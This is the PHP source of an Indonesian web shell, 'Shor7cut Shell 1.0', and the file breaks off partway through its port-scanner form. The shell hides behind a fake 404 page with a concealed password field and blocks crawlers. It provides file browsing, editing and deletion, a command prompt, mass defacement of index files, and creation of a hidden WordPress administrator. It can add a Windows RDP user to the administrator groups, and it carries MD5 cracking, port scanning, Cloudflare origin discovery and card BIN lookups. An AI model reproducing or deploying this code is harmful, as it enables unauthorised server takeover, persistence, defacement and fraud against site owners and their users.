<?php
session_start();
error_reporting(0);
@ob_start();
@set_time_limit(0);

/*
	Shor7cut Shell 1.0
	Hiduplah Indonesia Raya
	(C) 2015
*/

$s_pass = "aa:6dd166f401ab459f6dd166f401ab459f"; // default password : shor7cut_shell
$s_auth = false;
$negara_show = false; //true untuk mengaktifkan

// block search engine bot
if(isset($_SERVER['HTTP_USER_AGENT']) && (preg_match('/bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww/i', $_SERVER['HTTP_USER_AGENT']))){
	header("HTTP/1.0 404 Not Found");
	header("Status: 404 Not Found");
	die();
}
elseif(!isset($_SERVER['HTTP_USER_AGENT'])){
	header("HTTP/1.0 404 Not Found");
	header("Status: 404 Not Found");
	die();
}


function cek_key($key,$s_pass,$auth){
	/*
	Passalt7 by shor7cut
	*/
$jum_key = strlen($key);
$enc = md5($key);
$jum_key = substr(md5($jum_key),0,2);
$enc_1 = substr($enc, 18);
$enc_2 = substr($enc, 0,17);
$hasil = "$jum_key:".substr(md5($enc_1),0,16).substr(md5($enc_1),0,16);
switch ($auth) {
	case 'login':
if($s_pass==$hasil){
	$s_auth = true;
}else{
	$s_auth = false;
}return $s_auth;
	break;
	case 'generate':
return $hasil;
	break;
	
	default:
		# code....
	break;
}
}
function perms($file){
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));

return $info;
}
function filesize_formatted($file)
{
    $bytes = filesize($file);

    if ($bytes >= 1073741824) {
        return number_format($bytes / 1073741824, 2) . ' GB';
    } elseif ($bytes >= 1048576) {
        return number_format($bytes / 1048576, 2) . ' MB';
    } elseif ($bytes >= 1024) {
        return number_format($bytes / 1024, 2) . ' KB';
    } elseif ($bytes > 1) {
        return $bytes . ' bytes';
    } elseif ($bytes == 1) {
        return '1 byte';
    } else {
        return '0 bytes';
    }
}

if(!isset($_SESSION["login"])){
	header("HTTP/1.0 404 Not Found");
	header("Status: 404 Not Found");
	echo '
	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL '.$_SERVER['PHP_SELF'].' was not found on this server.</p>
<hr>
<address>Apache '.phpversion().' Server at '.$_SERVER['SERVER_NAME'].' Port 80</address>
	<style>input { margin:0;background-color:#fff;border:0px solid #fff; color:#fff; text-align:center;}</style>
	<form action="" method="post">
	<center><input type=password name="Passalt7"></center>
	</body></html>
</form>';
if($_POST['Passalt7']){
	$cek = cek_key($_POST['Passalt7'],$s_pass,"login");
	if($cek){
		$_SESSION["login"]=$_POST['Passalt7'];
		header('Location: ?');
	}
}

}else{
/* info */
header("HTTP/1.1 404 Not Found");
$s_ver = "1.0";
$s_author = "shor7cut";
$s_system = php_uname();
$s_software = getenv("SERVER_SOFTWARE");
if(ini_get('safe_mode') ){
$s_mode = "<font color=00FF1E>Save Mode</font>";
}else{
$s_mode = "<font color=red>Save Mode</font>";
}
if(ini_get('display_errors') ){
$s_dis_error = "<font color=00FF1E>Display Error</font>";
}else{
$s_dis_error = "<font color=red>Display Error</font>";
}
function cek_locat($ip){
$result = file_get_contents("http://www.telize.com/geoip/{$server_ip}");
$data = json_decode($result, true);
$flag = $data['country'];
return $flag;
}
// server ip
$s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
// your ip ;-)
$s_my_ip = $_SERVER['REMOTE_ADDR'];
if($negara_show){
$s_negara = "[ ".cek_locat($_SERVER['SERVER_NAME'])." ]";
}
if((strtolower(substr($s_system,0,3)) == "win")){
	$s_os = "<font color=#00FF1E>Windows</font>";
	$s_os_code = "1";
}else{
	$s_os = "<font color=#00FF1E>Linux</font>";
	$s_os_code = "2";
}function shc_byte($s) {
if($s >= 1073741824)
return sprintf('%1.2f',$s / 1073741824 ).' GB';
elseif($s >= 1048576)
return sprintf('%1.2f',$s / 1048576 ) .' MB';
elseif($s >= 1024)
return sprintf('%1.2f',$s / 1024 ) .' KB';
else
return $s .' B';
}
function showdisablefunctions() {
    if ($disablefunc=@ini_get("disable_functions")){ 
    	return "<span style='color:red'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; 
    }
    else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
    }
if (function_exists('ocilogon')){
	$s_Oracle = '<font color="#00FF1E">Oracle</font>';
}else{
	$s_Oracle = '<font color="red">Oracle</font>';
}
if(function_exists('mssql_connect')){
$s_mssql_connect = '<font color="#00FF1E">MsSQL</font>';
}else{
$s_mssql_connect = '<font color="red">MsSQL</font>';
}if(function_exists('mysql_connect')){
$s_mysql_connect = '<font color="#00FF1E">MySQL</font>';
}else{
$s_mysql_connect = '<font color="red">MySQL</font>';
}
if (function_exists('curl_version')){
	$s_curl = '<font color="#00FF1E">cURL</font>';
}else{
	$s_curl = '<font color="red">cURL</font>';
}function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
if(isset($_GET['cd'])){
$s_patch_i = $_GET['cd'];
}else{
$s_patch_i = getcwd();
}
$s_info.='<tr><td>'.$s_software.'</td></tr>';
$s_info.='<tr><td>'.$s_system.'</td></tr>';
$s_info.='<tr><td>Server IP : '.$s_server_ip.' '.$s_negara.'| '.$s_my_ip.' [<a href="http://facebook.com/bug7sec">SHOR7CUT</a>][<a href="?shc=logout">LOGOUT</a>]</td></tr>';
$s_info.='<tr><td>HDD '.shc_byte(disk_free_space("/")).'/'.shc_byte(disk_total_space("/")).'</td></tr>';
$s_info.='<tr><td>Disabled Functions : '.showdisablefunctions().'</td></tr>';
$s_info.='<tr><td>['.$s_os.']'.$s_mode.'|'.$s_mysql_connect.'|'.$s_mssql_connect.'|'.$s_Oracle.'|'.$s_curl.'|'.$s_dis_error.'</td></tr>';
/* nav */
$s_nav.='[<a href="?">Home</a>]';
$s_nav.='[<a href="?shc_command=dir">console</a>]';
$s_nav.='[<a href="?shc=newfile&loc='.$s_patch_i.'">Buat File</a>]';
$s_nav.='[<a href="?shc=tools">Tools Pack</a>]';
$s_nav.='[<a href="?shc=wp-admin">Wp-Admin</a>]';
$s_nav.='[<a href="?shc=md5">MD5 Cracker</a>]';
$s_nav.='[<a href="?shc=krdp">K-RDP</a>]';
$s_nav.='[<a href="?shc=mdeface">Mass Deface</a>]';
$s_nav.='[<a href="?shc=ipresolver">IP Resolver (cloudflare)</a>]';
$s_nav.='[<a href="?shc=portscan">Port Scanner</a>]';
$s_nav.='[<a href="?shc=shellpass">Password</a>]';
$s_nav.='[<a href="?shc=binchecker">Bin Checker</a>]';
/*------*/


	?>
<!DOCTYPE html>
<html>
<head>
	<title>Shor7cut Shell <?= $s_ver; ?></title><style type='text/css'>
*{font-family:Ubuntu Mono,serif;}body{background:#000000;font-size:12px;color:#ffffff;font-weight:400;}hr{border:1px solid #222222;}a{color:#4c83af;text-decoration:none;}a:hover{color:#ffffff;}pre{padding:0 8px;}form{display:inline;}table th,p{cursor:default;}#main{background:#111111;-moz-border-radius:10px;border-radius:10px;width:100%;padding:2px 8px;}#header{text-align:left;margin:0;padding:0;}#header td{margin:0;padding:0;}#header h1{font-size:20px;-webkit-transform:rotate(-13.37deg);-moz-transform:rotate(-13.37deg);margin:0;padding:0;}#header h1 a,.explorelist:hover a{color:#ffffff;}#menu{background:#111111;margin:0 2px 4px;}#result{-moz-border-radius:10px;border-radius:10px;border:1px solid #4c83af;line-height:16px;background:#111111;color:#aaaaaa;margin:0 0 8px;padding:4px 8px;}.headinfo{border-left:1px solid #4c83af;margin:6px;padding:2px 0 0 16px;}.headtbls tr{height:24px;vertical-align:middle;}.gaya,.ver{color:#4c83af;font-weight:700;}.ver{-webkit-transform:rotate(-13.37deg);-moz-transform:rotate(-13.37deg);letter-spacing:2px;}.menumi{background:#292929;color:#4c83af;text-decoration:none;letter-spacing:2px;font-size:12px;-webkit-transform:rotate(-13.37deg);-moz-transform:rotate(-13.37deg);-moz-border-radius:4px;border-radius:4px;margin:0;padding:4px 8px;}.menumi:hover{background:#363636;-webkit-transform:rotate(13.37deg);-moz-transform:rotate(13.37deg);}.inputz,.prompt,.txtarea{background:#111111;border:0;border-bottom:1px solid #393939;font-size:12px;color:#ffffff;padding:2px;}.prompt{font-weight:700;}.txtarea{width:100%;height:370px;}.inputzbut{font-size:12px;background:#191919;color:#4c83af;border:1px solid #222222;margin:0 4px;}.explore{width:100%;padding:4px 0;}.explore a{text-decoration:none;}.explore td{border-bottom:1px solid #222222;line-height:24px;vertical-align:top;padding:0 8px;}.explore th{font-weight:700;background:#222222;padding:6px 8px;}.explore tr:hover{background:#181818!important;}.sembunyi{display:none;margin:0;padding:0;}.info table{width:100%;border-radius:6px;border:1px solid #4c83af;margin:4px 0;padding:8px;}.info th,th{background:#181818;font-weight:700;}.info td{border-bottom:1px solid #222222;}.info h2{text-align:center;font-size:15px;background:#1c1c1c;letter-spacing:6px;border-radius:6px;border-bottom:1px solid #4c83af;margin:4px 0 8px;padding:10px;}.info a{color:#cccccc;}.viewfile{width:100%;border-bottom:1px solid #222222;margin:0 0 4px;}.viewfile td{border-bottom:1px solid #222222;background:#181818;height:24px;padding:2px 4px;}.viewfilecontent{padding:11px 8px;}.mybox{-moz-border-radius:10px;border-radius:10px;border:1px solid #4c83af;margin:4px 0 8px;padding:14px 8px;}.mybox h2{border-bottom:1px solid #444444;color:#4c83af;margin:0;padding:0 0 8px;}.notif{background:#4c83af;color:#000000;border-radius:6px;font-weight:700;margin:3px 0;padding:4px 8px 2px;}.notif a{color:#000000;}.footer{text-align:right;font-size:10px;letter-spacing:2px;color:#222222;padding:0 16px;}.headtbl,.myboxtbl{width:100%;}input[type=checkbox].css-checkbox + label.css-label{padding-left:20px;height:15px;display:inline-block;line-height:15px;background-repeat:no-repeat;background-position:0 0;vertical-align:middle;cursor:pointer;}input[type=checkbox].css-checkbox:checked + label.css-label{background-position:0 -15px;}.info,.info h1,.info hr,input[type=checkbox].css-checkbox{display:none;}.css-label{background-image:url();}
</style>
	<style type="text/css">
<!--
body,td,th {
	font-family: Courier New;
	font-size: 12px;
	color: #636161;
}
body {
	margin-top: 100px;
	margin-left: 200px;
	margin-right: 200px;
	background-color: #0D0C0C;
}

nav {
	margin-top: -6%;
	margin-left: 200px;
	margin-right: 200px;
	background-color: #0D0C0C;
}
a {
    color: #4c83af;
    text-decoration: none;
}
h1,h2,h3,h4,h5,h6 {
	font-style: italic;
}h3 {
    font-family: 'Nova Flat';
    font-size: 22px;
    font-style: normal;
    font-variant: normal;
    font-weight: 500;
    line-height: 15.4px;
}
.inputz, .prompt, .txtarea {
    background: #111111;
    border: 0;
    border-bottom: 1px solid #393939;
    font-size: 12px;
    color: #ffffff;
    padding: 2px;
}
h1 {
	font-family: 'Nova Flat';
	font-size: 24px;
	font-style: normal;
	font-variant: normal;
	font-weight: 500;
	line-height: 26.4px;
}

p {
	font-family: TimesNewRoman, 'Times New Roman', Times, Baskerville, Georgia, serif;
	font-size: 14px;
	font-style: normal;
	font-variant: normal;
	font-weight: 400;
	line-height: 20px;
}
blockquote {
	font-family: 'Nova Flat';
	font-size: 21px;
	font-style: normal;
	font-variant: normal;
	font-weight: 400;
	line-height: 30px;
}
pre {
	font-family: TimesNewRoman, 'Times New Roman', Times, Baskerville, Georgia, serif;
	font-size: 13px;
	font-style: normal;
	font-variant: normal;
	font-weight: 400;
	line-height: 18.5714px;
}
logo {
font-family: Orbitron;
	font-size: 20px;
	font-style: normal;
	font-variant: normal;
	font-weight: 500;
	line-height: 26.4px;
	color: #38AF3C;
}plogo {
	font-family: Orbitron;
	font-size: 14px;
	font-style: normal;
	font-variant: normal;
	font-weight: 400;
	line-height: 20px;
	color: #30D0BB;
}
input {
	margin: 6px;
}
-->
</style>

<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Orbitron" />
<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Nova+Flat" />
<link rel="shortcut icon" href="" />
</head>
<body>
<p align="left"><font color="red"><logo>SHOR7CUT</logo></font><font color="white"> SHELL</font><br>
<plogo><?= 'versi ' .$s_ver.' | <font color=red>INDON</font><font color=white>ESIA</font>';?></plogo>
<nav>
<table>
<?php
echo $s_info; 
?>
</table>
</nav>
<p align="center">
<?= $s_nav; ?>
</p>
		<?php
echo '<div id="result">';
/*
if(isset($_GET['cd'])){
$s_patch_i = $_GET['cd'];
}else{
$s_patch_i = getcwd();
}
*/
$s_patch = str_replace('\\','/',$s_patch_i);
$s_patch = explode('/',$s_patch);
foreach ($s_patch as $s_key => $s_patch_value) {

if($s_patch_value == '' && $s_key == 0){
$a = true;
echo '<a href="?cd=/">/</a>';
continue;
}

if($s_patch_value == '') continue;
echo '<a href="?cd=';
for($i=0;$i<=$s_key;$i++){
echo "$s_patch[$i]";
if($i != $s_key) echo "/";
}
echo '">'.$s_patch_value.'</a>/';
}
echo '</div>';		
?>
<div id="result">
<form action="" method="get">
	shor7cut-shell:~<input type="text" name="shc_command" size="110%" 
	style="color: greenyellow;background-color: transparent;border-color: transparent;"
	placeholder="Command">
</form>
</div>
<?php
if($_GET['view']){
$current = file_get_contents($_GET['view']);
if($current){
	echo '<div id="result">
	<textarea style="margin: 0px; height: 357px; width: 919px;" name="data_edit" disabled>
	'.htmlentities($current).'
	</textarea></div>';
}
}
?>

<?php

if($_POST['aksishor7cut']){
echo '<div id="result">';
if($_POST['aksishor7cut']=="rename"){
	$patch_asli = $_POST['patchrename'];
	$nama_baru = $_POST['nama_file_baru'];
	$lokasi_asli = $_POST['patch_rename']."/";
	if(rename($patch_asli, $lokasi_asli.$nama_baru)){
		echo "Rename Berhasil";
	}else{
		echo "Rename Gagal";
	}
	
}else if($_POST['aksishor7cut']=="edit"){
$lokasi_asli = $_POST['patchrename'];
$data_edit = $_POST['data_edit'];

$fp = fopen($lokasi_asli,'w');
if(fwrite($fp, $data_edit)){
	echo "Edit File Berhasil";
}else{
	echo "Edit File Gagal";
}
fclose($fp);


}
if($_POST['opsi']=="rename"){?>
<form action="" method="post">
	<input type="text" name="nama_file_baru" value="<?php echo $_POST['s_name_file'];?>">
	<input type="hidden" name="patchrename" value="<?php echo $_POST['s_patch_lct'];?>">
	<input type="hidden" name="patch_rename" value="<?php echo $_POST['s_loca_file'];?>">
	<input type="submit" name="aksishor7cut" value="rename">
</form>
<?php
}else if($_POST['opsi']=="delete"){
if(unlink($_POST['s_patch_lct'])){
	echo "Berhasil Menghapus";
}else{
	echo "Gagal Menghapus";
}
}else if($_POST['opsi']=="edit"){
echo "<div id=result> Lokasi : ".htmlentities($_POST['s_patch_lct']).'</div>';?>
<form action="" method="post">
<textarea style="margin: 0px; height: 357px; width: 919px;" name="data_edit">
<?php
$current = file_get_contents($_POST['s_patch_lct']);
echo htmlentities($current);
?>
</textarea>
<input type="hidden" name="patchrename" value="<?php echo $_POST['s_patch_lct'];?>">
<input type="submit" name="aksishor7cut" value="edit">
</form>
<?php
}else if($_POST['opsi']=="download"){
	echo $_POST['s_patch_lct'];
	ob_end_clean();
        $f = $_POST['s_patch_lct'];
        $fc = file_get_contents($f);
        header("Content-type: application/octet-stream");
        header("Content-length: ".strlen($fc));
        header("Content-disposition: attachment; filename=\"".basename($f)."\";");
        echo $fc;
}
}
echo '</div>';
?>
<?php
/* menu nav func */

/*---------------*/
if($_GET['shc']=="logout"){
		session_unset($_SESSION["login"]);
		header('Location: ?');
}else if($_GET['shc']=="tools"){?>
<div id="result">
<table class="explore sortable"><thead>
	<tr><th style="width:24px;" class="sorttable_nosort"></th>
	<th style="width:200px;">Nama</th>
	<th style="width:50px;">Keterangan</th>
	<th style="width:10px;">action</th>
	</tr>
	</thead>
	<tbody>
	<tr>		
	<td>~</td>
	<td>HN Priv8 Tools</td>
	<td style="width:4px;">-</td>
	<td style="width:4px;">[Download]</td>
	</tr>
	</tbody>
	</table>
</div>
<?php
}else if($_GET['shc']=="wp-admin"){
function random_string()
{
    $character_set_array = array();
    $character_set_array[] = array('count' => 7, 'characters' => 'abcdefghijklmnopqrstuvwxyz');
    $character_set_array[] = array('count' => 1, 'characters' => '0123456789');
    $temp_array = array();
    foreach ($character_set_array as $character_set) {
        for ($i = 0; $i < $character_set['count']; $i++) {
            $temp_array[] = $character_set['characters'][rand(0, strlen($character_set['characters']) - 1)];
        }
    }
    shuffle($temp_array);
    return implode('', $temp_array);
}
?>
<div id="result">
<pre>WP-ADMIN (add user admin)</pre>
<form action="" method="post">
<input type="hidden" name="email" value="<?= random_string(0);?>@shor7cutshell.com" placeholder="Email">
	Username : <input type="text" name="username" placeholder="Username"> Password : <input type="text" name="password" placeholder="Password"> 
	<input type="submit" name="shc_tambah" value="Tambah"> 
</form>
<?php 
if($_POST['shc_tambah']){
echo "<hr>[+] support di wp versi 4.x.x<br>";
if ( !isset($wp_did_header) ) {
 
    $wp_did_header = true;
 
    require_once( dirname(__FILE__) . '/wp-load.php' );
 
    wp();
 
    require_once( ABSPATH . WPINC . '/template-loader.php' );
 
}
require_once( dirname(__FILE__) . '/wp-includes/registration.php' );
 
// Change this , you are free to put the logins you want ^_^
$newusername = $_POST['username'];
$newpassword = $_POST['password'];
$newemail =  $_POST['email'];

 
// Set The Configs vars
if ( $newpassword != 'YOURPASSWORD' && $newemail != 'YOUREMAIL@TEST.com' && $newusername !='YOURUSERNAME'  )
{
        // Check that the user doesn't exist already
        if ( !username_exists($newusername) && !email_exists($newemail) )
        {
                // Create the admin user and set the role to Administrator
                $user_id = wp_create_user( $newusername, $newpassword, $newemail);
                if ( is_int($user_id) )
                {
                        $wp_user_object = new WP_User($user_id);
                        $wp_user_object->set_role('administrator');
                        echo '[+] Username : '.$newusername.'<br>';
                        echo '[+] Password : '.$newpassword.'<br>';
                        echo '[+] Email    : '.$newemail.'<br>';

                }
                else {
                        echo '[x] Gagal menambahkan akun baru';
                }
        }
        else {
                echo '[x] Kimcil sudah pernah dipake mas, wis ra perawan username dan passwordnya';
        }
}
else {
        echo "Gak bisa di set username , password dan emailnya mas :v muka mu lah di anu sek.";
}
}?>
</div>
<?php
}else if($_GET['shc']=="md5"){
?>
<div id="result">
<form action="" method="post">
	<label>MD5 String/Hash : </label><input type="text" name="md5">
	<select name="opsi">
		<option value="1">Crack</option>
		<option value="2">Generete</option>
	</select>
	<input type="submit" name="shc_md5" value="Submit">
</form>
<?php
if($_POST['shc_md5']){
echo '<hr>';
if($_POST['opsi']=="1"){
$type   = "crack";
$apikey = "LCqV5sOtw4dno6CY";
$phrase = $_POST['md5'];
$return = json_decode(file_get_contents("http://api.md5crack.com/".$type."/".$apikey."/".$phrase),true);
if($return['code']=="6"){
$info.="[MD5Crack] <font color=greenyellow>".$return['phrase']."|".$return['parsed']."</font>";
echo $info;
}
}else if($_POST['opsi']=="2"){
$type   = "hash";
$apikey = "LCqV5sOtw4dno6CY";
$phrase = $_POST['md5'];
$return = json_decode(file_get_contents("http://api.md5crack.com/".$type."/".$apikey."/".$phrase),true);

if($return['code']=="5"){
$info.="[MD5 Generate] <font color=greenyellow>".md5($_POST['md5'])."</font>";
echo $info;
}


}else{
	echo "opsi tidak ditemukan!!!";
}

}
?>
</div>
<?php
}else if($_GET['shc']=="krdp"){?>
<div id="result">
<form action="" method="post">
	<input type="text" name="username"  placeholder="Username" value="shcshell">
	<input type="text" name="password"  placeholder="Password" value="shcshell">
	<input type="submit" name="shc_krdp" value="Submit">
</form>
<pre>
<?php
if($_POST['shc_krdp']){
	$krdp_user = $_POST['username'];
	$krdp_password = $_POST['password'];
	$cmd_cek_user   = shell_exec("net user");
	if(preg_match("/$krdp_user/", $cmd_cek_user)){
            echo $krdp_user." sudah ada";
    }else {
    $admin_list = array(
    	'Administrators',
    	'Administrator',
    	'Administrateur',
    	'admins',
    	'sadmin',
    	'Administrador',
    	);
    if(shell_exec("net user ".$krdp_user." ".$krdp_password." /add")){
    echo "[+] USER : <font color=greenyellow>".$krdp_user."|".$krdp_password."</font><br>";
    foreach ($admin_list as $key => $admins_list) {
    if(shell_exec("net localgroup $admins_list ".$r_user." /add")){
    echo "[+] localgroup : <font color=greenyellow>$admins_list</font><br>";
    }else{
    echo "[+] <font color=red>Kesalahan pada localgroup $admins_list</font><br>";
    }
    }echo "[INFO] Connect to IP Computer (RDP) <font color=greenyellow>".$s_server_ip."</font><br>";
    echo '<hr>[NET USER INFO]<br>'.shell_exec("net user");
    }else{
    echo "[+] Username : <font color=red>".$krdp_user." | Password : ".$krdp_password." , Gagal menambahkan</font><br>";	
    }
    }
}
?>
</pre>
</div>
<?php
}else if($_GET['shc']=="mdeface"){
$returnValue = explode('public_html',getcwd());
$base_dirs = $returnValue[0];
?>
<div id="result">
<form action="" method="post">
Base DIR : <input type="text" name="base_dir" size="50" value="<?php echo $base_dirs;?>"> Filename : <input type="text" name="file_name" value="index.php"><br><br>
<textarea style="margin: 0px; height: 357px; width: 919px;" name="index" >
hacked by shor7cut
</textarea>
<input type="submit" name="shc_mdeface" value="Ah... sekarang">
</form>
<?php
if($_POST['shc_mdeface']){
echo '<hr>';
	if (isset ($_POST['base_dir']))
{
        if (!file_exists ($_POST['base_dir']))
                die ($_POST['base_dir']." Not Found !<br>");
 
        if (!is_dir ($_POST['base_dir']))
                die ($_POST['base_dir']." Is Not A Directory !<br>");
 
        @chdir ($_POST['base_dir']) or die ("Cannot Open Directory");
 
        $files = @scandir ($_POST['base_dir']) or die ("oohhh shet<br>");
 
        foreach ($files as $file):
                if ($file != "." && $file != ".." && @filetype ($file) == "dir")
                {
                        $index = getcwd ()."/".$file."/".$_POST['file_name'];
                        if (file_put_contents ($index, $_POST['index']))
                                echo "shor7cut-shell:~ $index&nbsp&nbsp&nbsp&nbsp<span style='color: green'>OK</span><br>";
                }
        endforeach;
}
}
?>
</div>
<?php
}else if($_GET['shc']=="shellpass"){?>
<div id="result">
<form action="" method="post">
	Passalt7 : <input type="text" name="password">
	<select name="metode">
		<option value="ganti">Ganti Password Shell</option>
		<option value="buat">Buat Hash Passalt7</option>
	</select>
	<input type="submit" name="shc_password" value="Buat Passalt7">
</form>

<?php
if($_POST['shc_password']){
if($_POST['metode']=="ganti"){
	echo "<hr>";
	$newpassword = cek_key($_POST['password'],$_POST['password'],"generate");
	$old_pass = '"'.$s_pass.'";';
	$new_pass = '"'.$newpassword.'";';
    if(file_get_contents($_SERVER['SCRIPT_FILENAME'])){
    	$s_gpass = file_get_contents($_SERVER['SCRIPT_FILENAME']);
    	$s_gpass = preg_replace("/$old_pass/is",$new_pass,$s_gpass);
    if(file_put_contents($_SERVER['SCRIPT_FILENAME'], $s_gpass)){
    	echo "shor7cut-shell:~ password baru : <font color=red>".$_POST['password']."</font> - <font color=greenyellow>$newpassword</font>";
    }
    }else{
    	echo "Password gagal";
    }
}else{
	$cek = cek_key($_POST['password'],$_POST['password'],"generate");
	echo '<hr>Passalt7 Hash : <font color="greenyellow">'.$cek.'</font><br>';
}


	
/*
	$new_pass = md5("akasssssssu");
    $s_gpass = file_get_contents($_SERVER['SCRIPT_FILENAME']);
    $s_gpass = preg_replace("/$s_pass/is",$new_pass,$s_gpass);
    file_put_contents($_SERVER['SCRIPT_FILENAME'], $s_gpass);
*/

}
?>
</div>
<?php
}else if($_GET['shc']=="newfile"){?>
<?php
if($_SESSION['pemberitahuan']){
	echo '<div id="result">
'.$_SESSION['pemberitahuan'].'</div>';
unset($_SESSION['pemberitahuan']);
}
?>
<div id="result">
<form action="" method="post">
Nama File : <input type="text" name="namafile" required>
Loca File : <input type="text" name="lokasi" value="<?php echo $_GET['loc'];?>">
<textarea style="margin: 0px; height: 357px; width: 919px;" name="buat_file"></textarea>
<input type="submit" name="shcnfile">
</form>

<?php
if($_POST['shcnfile']){
echo "<hr>";
if(!empty($_POST['namafile'])){
$is = $_POST['lokasi'].'/'.$_POST['namafile'];
$tangan = fopen($is, 'w') or die("can't open file");
if(fwrite($tangan, $_POST['buat_file'])){
	$_SESSION['pemberitahuan']="File ".$_POST['namafile']." sudah dibuat";
	header('Location: ?shc=newfile&loc='.$_GET['loc'].'');
}else{
	$_SESSION['pemberitahuan']="File ".$_POST['namafile']." tidak bisa dibuat";
	header('Location: ?shc=newfile&loc='.$_GET['loc'].'');
}
fclose($tangan);
}else{
	echo "ada yang kurang";
}
}?>
</div>


<?php
}else if($_GET['shc']=="binchecker"){?>
<div id="result">
<form action="" method="post">
<p align="center">-= BIN CHECKER =-</p>
	<textarea style="    margin: 0px;
    width: 500px;
    height: 129px;
    background-color: transparent;
    color: white;
    border: none;" name="binlist">BIN CODE</textarea><br>
	<input type="submit" name="shcbincheck" value="check bin">
</form><pre>
<?php
if($_POST['shcbincheck']){
echo "<hr>";
function singl3_j3mbut($j3m8u7){
        $amb1l_j3mbut = file_get_contents("http://www.binlist.net/json/$j3m8u7");
        $dec0d3_j3mbut = json_decode($amb1l_j3mbut,TRUE);
        return $dec0d3_j3mbut;
}
$x = explode("\r\n", $_POST['binlist']);
foreach ($x as $key => $value) {
	$dec0d3_j3mbut = singl3_j3mbut($value);
	if($dec0d3_j3mbut['bin']){
		echo "BIN INFO : <font color=white>".$dec0d3_j3mbut['bin']."</font>|<font color=yellow>".$dec0d3_j3mbut['bank']."</font>|<font color=blue>".$dec0d3_j3mbut['brand']."</font>|<font color=red>".$dec0d3_j3mbut['card_type']."</font>|<font color=green>".$dec0d3_j3mbut['country_name']."</font><br>";
	}
}
}
?>
</pre>
</div>


<?php
}else if($_GET['shc']=="ipresolver"){?>
<div id="result">
<form action="" method="post">
	Domain : <input type="text" name="domain"  placeholder="localhost.com" >
	<input type="submit" name="shcresolver" value="Resolver">
</form>
<?php
if($_POST['shcresolver']){
	echo "<hr>";
	function is_ipv4($ip)
{
    return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
}

$url = $_POST['domain'];
$sdom = array('www.','cpanel.', 'ftp.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'forum.');
$count = count($sdom);


foreach ($sdom  as $key => $value) {
    $urls = $value.$url;
    $ip = is_ipv4(gethostbyname($urls));
    $headers = get_headers("http://".$ip, 1);
    $server = $headers['Server'];
    $http_code = $headers['0'];
if(preg_match('/cloudflare/i', $server)){
    echo $urls." [<font color=red>cloudflare $ip </font>] $http_code<br>";
}else{
    echo $urls." [<font color=green>cloudflare $ip </font>] $http_code<br>";
}  
  flush();
  ob_flush();
}
}
?>
</div>
<?php
}else if($_GET['shc']=="portscan"){
?>
<div id="result">

<?php
$port_list = array(
	'HTTP' => '80',
	'SSL' => '443',
	'MySQL' => '3306',
	'FileZilla' => '21',
	'Tomcat7' => '8005',
	'FTP' => '21',
	'SSH' => '22',
	'Telnet' => '23',
	'SMTP' => '25',
	'SMTP (Alt)' => '2525',
	'POP Server' => '110',
	'NNTP' => '119',
	'RDP' => '3389',
	'IMAP4' => '143'
	);
if($_POST['shcportscan']){
	echo '<hr><p align="center">-= <a href="?shc=portscan">Port Scanner</a> =-</p><br>';
	$host = $_POST['host'];
	$port = $_POST['metode'];
	$cport = $_POST['cusport'];
	if(!empty($_POST['cusport'])){
	$fp = @fsockopen($host, $cport, $errno, $errstr, 3);
    if($fp){
    	echo 'shor7cut-shell:~ <font color="greenyellow">Host : '.$host.' | Port '.$port.' terbuka</font><br>';
    }else{
    	echo 'shor7cut-shell:~ <font color="red">Host : '.$host.' | Port '.$port.' tertutup</font><br>';
    }
	}
	if($_POST['metode']=="scanall"){
	foreach ($port_list as $key => $value) {
		$fp = @fsockopen($host, $value, $errno, $errstr, 3);
    if($fp){
    	echo 'shor7cut-shell:~ <font color="greenyellow">Host : '.$host.' | Port '.$value.' terbuka</font><br>';
    }else{
    	echo 'shor7cut-shell:~ <font color="red">Host : '.$host.' | Port '.$value.' tertutup</font><br>';
    }
    flush();
    ob_flush();
}
echo '<br>';
}else{
	$fp = @fsockopen($host, $port, $errno, $errstr, 3);
    if($fp){
    	echo 'shor7cut-shell:~ <font color="greenyellow">Host : '.$host.' | Port '.$port.' terbuka</font><br>';
    }else{
    	echo 'shor7cut-shell:~ <font color="red">Host : '.$host.' | Port '.$port.' tertutup</font><br>';
    }
echo '<br>';}
}else {?>
<form action="" method="post">
	Target Host : <input type="text" style="color: white;
    border-color: transparent;
    background-color: #000000;" placeholder="Host Target" name="host" value="localhost">
    <input type="text" name="cusport" size="1" style="color: white;
    border-color: transparent;
    background-color: #000000;" value="">
    <select name="metode">
	<option value="scanall">Semua Port</option>
	<?php
